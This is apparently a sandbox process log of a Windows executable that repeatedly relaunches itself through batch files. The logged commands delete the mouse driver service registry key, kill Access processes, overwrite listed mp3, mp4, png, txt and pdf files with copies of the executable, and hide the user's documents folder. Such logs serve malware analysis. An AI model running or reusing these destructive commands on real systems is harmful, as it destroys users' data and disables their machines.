C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:3784
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\E0DE.tmp\E0FD.tmp\E0FE.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:10144

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:3740
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\D4EB.tmp\D4EC.tmp\D4ED.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:8576

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:3732
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\DDA2.tmp\DDA3.tmp\DDA4.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:9684

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:3716
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\DCB8.tmp\DCB9.tmp\DCBA.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:9428

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:3708
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\DCC8.tmp\DCD8.tmp\DCE9.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:9508

C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
1⤵
PID:3700

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:3984
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\DA19.tmp\DA1A.tmp\DA1B.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:6868

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:3976
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\E0CF.tmp\E0EE.tmp\E0FE.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:10076

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:3952
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\DE10.tmp\DE11.tmp\DE12.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:9768

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:3940
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\E88B.tmp\E88C.tmp\E88D.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:9236

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:3924
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\E784.tmp\E792.tmp\E793.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:10140

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:4016
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\D4DC.tmp\D4DD.tmp\D4DE.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:8564

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:4024
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\DE11.tmp\DE20.tmp\DE21.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:9780

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:4000
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\E0D0.tmp\E0FD.tmp\E0FE.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:10108

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:4060
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\E0CE.tmp\E0EE.tmp\E0EF.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:10084

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:4068
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\DBC0.tmp\DBC0.tmp\DBE0.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:9252

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:4076
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\D568.tmp\D569.tmp\D56A.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:8644

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:3876
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\D9CB.tmp\D9CC.tmp\D9CD.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:8504

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:3856
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\D3A4.tmp\D3A5.tmp\D3A6.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:8496

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:4088
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\E495.tmp\E496.tmp\E497.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:9480

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K crash.bat
1⤵
PID:3672
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:8468
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:8516
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:8584
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:8664
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:8728
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:8864
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:8972
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:8792
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:8784
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:9616
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:9492
- C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
  2⤵
  PID:7528

C:\Windows\system32\tskill.exe
tskill msaccess
1⤵
PID:3600

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:3380
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\DE1F.tmp\DE20.tmp\DE21.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:9792

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:3300
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\DCD7.tmp\DCF8.tmp\DCF9.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:9524

C:\Windows\system32\tskill.exe
tskill msaccess
1⤵
PID:2828

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:4144
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\E782.tmp\E783.tmp\E784.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:10040

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:3480
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\DCD8.tmp\DCF8.tmp\DD08.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:9532

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:4376
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\E783.tmp\E783.tmp\E784.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:10068

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:4368
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\E84C.tmp\E84D.tmp\E84E.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:10188

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:4332
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\E09F.tmp\E0CF.tmp\E0D0.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:10060

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:1960

C:\Windows\system32\tskill.exe
tskill msaccess
1⤵
PID:3200

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:4392

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:3136
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\DCFA.tmp\DD07.tmp\DD08.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:9556

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:884

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:2488

C:\Windows\system32\tskill.exe
tskill msaccess
1⤵
PID:2356

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:952
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\E6C6.tmp\E6C7.tmp\E6D8.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:9904

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:2476

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:1800
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\E08F.tmp\E0A0.tmp\E0B0.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:10044

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:1828
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\D9CC.tmp\D9CC.tmp\D9CD.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:8572

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:2716

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:1928
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\9AD9.tmp\9ADA.tmp\9ADB.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:6688
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:6188
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp3.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:6040

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:2200
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\7B67.tmp\7B68.tmp\7B69.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:5368
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:4644
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp3.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:3668
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp4.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:6364
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:6320
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:7148
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_png.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:7164
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:7504
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_txt.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:7540
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:8364
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_pdf.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:8408
- - C:\Windows\system32\attrib.exe
    attrib +h "C:\Users\Admin\my documents"
    3⤵
    - Views/modifies file attributes
    PID:6912

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:1416
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\A1EA.tmp\A1EB.tmp\A1EC.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:7120
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:7996
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp3.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:8064
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp4.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:7032
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:7528

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:1600
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\77EE.tmp\77EF.tmp\77F0.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:3600
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:5876
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp3.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:5932
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:6532
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp4.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:6552
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_png.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:7252
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:7128

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:2648

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:2668
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\9E61.tmp\9E62.tmp\9E63.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:6916
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:7548
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp3.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:7580
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:8432
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp4.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:8440

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:2864
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\A2C5.tmp\A2C6.tmp\A2C7.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:5820
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:8032
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp3.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:8056
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp4.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:9076
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:9020

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:1908
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\79A3.tmp\79A4.tmp\79A5.bat C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe"
  2⤵
  PID:5240
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:5592
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp3.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:5476
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp4.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:6244
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:6188
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:6904
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_png.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:6988
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_txt.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe "%j:%k""
    3⤵
    PID:7096
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
    3⤵
    PID:6280

C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
C:\Users\Admin\AppData\Local\Temp\f774f78db788298bf7d2c202e8191982.exe
1⤵
PID:2792
- C:\Windows\system32\cmd.exe
